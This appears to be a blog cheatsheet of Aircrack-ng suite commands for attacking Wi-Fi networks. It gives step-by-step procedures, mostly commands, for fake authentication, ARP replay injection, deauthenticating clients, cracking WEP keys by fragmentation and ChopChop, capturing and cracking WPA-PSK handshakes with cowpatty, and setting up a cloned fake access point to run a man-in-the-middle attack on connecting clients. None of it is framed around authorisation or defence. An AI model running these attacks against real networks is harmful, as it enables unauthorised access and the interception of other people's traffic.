Never Ending Security

It starts all here

Aircrack-NG Suite Cheatsheet



Common Commands Used in Aircrack-ng Suite



Injection command


aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0

Fake Authentication Commands

aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0


Arp Replay Attack


aireplay-ng -3 -b 00:13:10:30:24:9C mon0

Basic usage:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name

There are two methods of replaying an ARP request which was previously injected. The first and simplest method is to use the same command plus "-r" to read the output file from your last successful ARP replay.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

Where:

-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name

The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name

NOTE: Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. Thus, the advantage of the next technique (interactive replay) is that it gets around this control.


Reveal Hidden SSID’s using aireplay-ng


For this attack to work you need an associated client on the network to deauthenticate. This works on all encryption levels and even on non-encrypted APs.

Make sure to open up airodump-ng on the channel of your target AP to watch for the SSID to be revealed in real time.

aireplay-ng -0 5 -a B:S:S:I:D mon0

That's all there is to it: when the client reconnects to the AP you will see the hidden SSID revealed in airodump-ng.


Decrypt WEP and WPA packets


NOTE: you must already have the network key (also called the password) to use this tool.

airdecap-ng -w password_key capture-01.cap

Use tshark as shown below to read the decrypted output. WEP and WPA have two different airdecap-ng commands to remember.

For WEP Encrypted Files:

tshark -r capture-01-dec.cap -c 10

For WPA encrypted files:

airdecap-ng -p password_key capture-01.cap -e linksys


Clientless WEP Attack using Fragmentation method 


Step 1:  aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

Step 2:  aireplay-ng -5 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0

Step 3:  When asked "Use this packet?" type "y" for yes, but from experience make sure the packet size is over 68.

Step 4:  Type ls to show the files in your root directory and copy the whole name of the file that ends in .xor

Step 5:  packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C -k 255.255.255.255 -l 255.255.255.255 -y fragment-001-002.xor -w arp-request

Step 6:  airodump-ng -c 11 --bssid B:S:S:I:D --ivs -w capture mon0

Step 7:  aireplay-ng -2 -r arp-request mon0

Step 8:  When asked "Use this packet?" type "y" for yes, but from experience make sure the packet size is 68 or over.

Step 9:  aircrack-ng -n 64 -b B:S:S:I:D *.ivs

This assumes you are attacking a 64-bit WEP network; if not, just use the regular aircrack-ng command.


Crack WEP using ChopChop method 


-1  is for Fake Authentication

-a  is for your Access Point's MAC Address

0   is for reassociation timing in seconds

-h  is for your card's MAC Address or that of an associated client on the network

-e  is the ESSID name of the AP you are attacking

-4  is for the ChopChop attack method

Step 1:

airodump-ng -c 11 -w dump_file -i mon0

Step 2:

aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

It should now say "Association successful" with a :)

Step 3:

aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0

The destination MAC address should not read FF:FF:FF:FF:FF:FF. If it does, do not continue until it changes or the attack will not work, so keep typing "n" for no until it is no longer FF:FF:FF:FF:FF:FF.

Step 4:

Now it should say "Saving plain text in replay_000-111-11122.cap". Copy the whole name of the .cap file.

Step 5:

tcpdump -s 0 -n -e -r replay_000-111-11122.cap

Step 6:

packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S -a B:S:S:I:D -l 255.255.255.255 -k 255.255.255.255 -y replay_000-111-11122.xor -w arp-cap

-0 is for the forged ARP packet

-h  is for your MAC address

-c  is for the associated client's MAC address

-a   is for the Access Points Mac address

-l  is to set the destination IP Address

-k  is to set the source IP Address

-y  means to read the PRGA from this file

-w  means to write the packet to this pcap file

Step 7:

aireplay-ng -2 -r arp-cap mon0

Step 8:

Type "y" to use the data packet when it asks, and from there the Data field in airodump-ng should start to rise dramatically.

Step 9:

aircrack-ng -a 1 -x -0 dump_file-01.ivs

dump_file is the prefix we wrote in step 1.

Step 10:

Then choose your target when asked and aircrack-ng will begin to run.


WEP attack with a  Client already connected to the Access Point


Step 1:

airodump-ng -c 11 -w wep -i mon0

-c  is the channel which the target is transmitting on

-w  is the Dump File prefix

-i means save only captured IVs

mon0   is your monitor mode interface as always

step 2:

aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

-1  is for Fake Authentication

0  is for reassociation timing in seconds

-e is for the target network ESSID, i.e. the AP's actual name as given by its owner, for example "FREE WIFI"

-a  is for your Access Point's MAC Address

-h  is for your own wireless card's MAC Address

Step 3:

aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0

-3  is for the ARP request Replay Attack

-b  is for your Access Point's MAC Address

-h  is for your source MAC Address (either a client or from a fake association)

Step 4:

aircrack-ng -a 1 -0 -n 128 wep-01.ivs

The 128 assumes you are cracking a 104-bit WEP network, and the file wep-01.ivs was created from the prefix given in step 1.

-a  is for force Attack mode

1    is for static WEP

-0    is to apply nice colors to the aircrack-ng terminal window when opened up

-n   is to specify the length for the key  128  for (104bit WEP)


Set up a Fake AP honeypot using brctl to get a client to connect and run a MITM attack


1. Bring up eth0 in BackTrack:

ifconfig eth0 up

2. Bring up an access point with the SSID of whatever network name you are trying to clone. For this tutorial I chose linksys, but you can make your own.

mitm          is your bridged interface name (you can name it whatever you like for this attack)

at0           is the new tap interface created by your wireless card and will be named by your card automatically

dhclient3     is your DHCP client which will help bridge your internet to the victim

ifconfig wlan0 up
airmon-ng start wlan0
iwconfig wlan0 channel 1
airbase-ng --essid linksys mon0

Bridge the interfaces

Open up another terminal window to run these commands:

ifconfig at0 up

brctl addbr mitm

brctl show        This will show that no interfaces have been added to the bridge yet, so we'll do that next

brctl addif mitm eth0

brctl addif mitm at0

ifconfig eth0 0.0.0.0 up      Vivek sets the IP address of both interfaces to all zeros, but you can try others if you like.

ifconfig at0 0.0.0.0 up

If you do ifconfig, you'll see a new bridge, mitm. Bring up the interface and request an address on it:

ifconfig mitm up

dhclient3 mitm

Now connect a client to the new AP and make sure you are able to surf the web using the at0 interface and the mitm bridge giving out DHCP. If you are, the options are endless ; )

Should your eth0 interface lose its connection to the internet, kill the mitm bridge using the command below. Make sure to bring it down first, as well as the at0 interface.

brctl delbr mitm        brctl stands for bridge control and delbr stands for delete bridge


WPA/WPA2-PSK Cracking using Rainbow Tables with Cowpatty


What do the switches in these commands really mean?

-c            The channel the AP is located on

--bssid       The MAC Address of the AP you are attacking

-0            Specifies to aireplay-ng that it will be a deauth attack (that's a zero, by the way)

-c            after the aireplay-ng command, specifies the client connected to the AP which you are attacking

./cowpatty    starts running cowpatty within BackTrack

-r            specifies the capture file you will be cracking using cowpatty

-d            The directory of the rainbow table you will be using for the attack, basically its location on your hard disk

Step 1:

airodump-ng -c 11 --bssid B:S:S:I:D -w LINKSYS mon0

Step 2:

aireplay-ng -0 1 -a B:S:S:I:D -c C:L:I:E:N:T mon0

You can increase the 1 to 5 or more depending on how many times you want to deauth the client.

Step 3:

./cowpatty    or just open up cowpatty from your start menu

Step 4:

cowpatty -r LINKSYS-01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS


Test a capture file to check its integrity


Open pyrit or cd into the pyrit directory and type the command below, replacing output-01.cap with your own capture file.

pyrit -r output-01.cap analyze
